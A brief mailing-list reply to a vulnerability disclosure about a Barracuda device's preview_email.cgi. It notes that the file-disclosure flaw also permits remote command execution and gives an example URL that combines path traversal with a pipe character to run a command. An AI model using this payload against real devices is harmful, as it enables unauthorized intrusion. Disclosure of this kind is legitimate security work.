gssincla@xxxxxxxxxxxxxxx wrote: > Title: Barracuda Arbitrary File Disclosure This vulnerability doesn't just allow arbitrary file disclosure, but also allows remote execution of commands through use of the pipe characher (|), e.g: https://<deviceIP>/cgi-bin/preview_email.cgi?file=/mail/mlog/../../bin/ls%20/| Regards, Matt